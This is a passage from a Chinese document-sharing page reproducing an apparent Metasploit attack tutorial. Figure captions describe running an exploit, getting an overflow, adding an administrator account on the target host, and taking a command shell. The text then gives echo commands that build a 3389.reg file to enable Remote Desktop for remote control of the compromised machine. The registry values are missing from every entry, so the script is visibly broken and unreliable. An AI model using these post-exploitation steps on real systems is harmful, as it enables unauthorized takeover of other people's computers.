云题海 - 专业文章范例文档资料分享平台

当前位置:首页 > metasploit

metasploit

  • 62 次阅读
  • 3 次下载
  • 2025/5/23 14:55:21

图 6 填写options

图 7 填写options

图 8 执行exploit

图 9 溢出过程

图 10 查看目标主机信息

图 11 目标主机IP信息

图 12 在目标主机上添加管理员用户

图 13 成功添加用户

注:所有图中显示的乱码是因为msf console不支持中文编码显示。不是执行错误。

2、开启目标主机的终端服务远程登录管理。 已经获得目标主机的command shell,接下来就要开启目标主机的3389终端服务远程控制目标主机。在这里我使用修改注册表的方法,启动终端服务。 以下是代码1内容:

echo Windows Registry Editor Version 5.00 >>3389.reg

echo[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\netcache] >>3389.reg

echo \

echo[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\Winlogon] >>3389.reg

echo \

echo [HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer] >>3389.reg echo \

echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server] >>3389.reg echo \

echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermDD] >>3389.reg echo \

echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService] >>3389.reg echo \

echo [HKEY_USERS\\.DEFAULT\\Keyboard Layout\\Toggle] >>3389.reg echo \

echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]>>3389.reg

echo \

echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\WinStations\\RDP-Tcp] >>3389.reg

echo \开启终端服务的注册表文件。

搜索更多关于: metasploit 的文档
  • 收藏
  • 违规举报
  • 版权认领
下载文档10.00 元 加入VIP免费下载
推荐下载
本文作者:...

共分享92篇相关文档

文档简介:

图 6 填写options 图 7 填写options 图 8 执行exploit 图 9 溢出过程 图 10 查看目标主机信息 图 11 目标主机IP信息 图 12 在目标主机上添加管理员用户 图 13 成功添加用户 注:所有图中显示的乱码是因为msf console不支持中文编码显示。不是执行错误。 2、开启目标主机的终端服务远程登录管理。 已经获得目标主机的command shell,接下来就要开启目标主机的3389终端服务远程控制目标主机。在这里我使用修改注册表的方法,启动终端服务。 以下是代码1内容: ech

× 游客快捷下载通道(下载后可以自由复制和排版)
单篇付费下载
限时特价:10 元/份 原价:20元
VIP包月下载
特价:29 元/月 原价:99元
低至 0.3 元/份 每月下载150
全站内容免费自由复制
VIP包月下载
特价:29 元/月 原价:99元
低至 0.3 元/份 每月下载150
全站内容免费自由复制
注:下载文档有可能“只有目录或者内容不全”等情况,请下载之前注意辨别,如果您已付费且无法下载或内容有问题,请联系我们协助你处理。
微信:fanwen365 QQ:370150219
Copyright © 云题海 All Rights Reserved. 苏ICP备16052595号-3 网站地图 客服QQ:370150219 邮箱:370150219@qq.com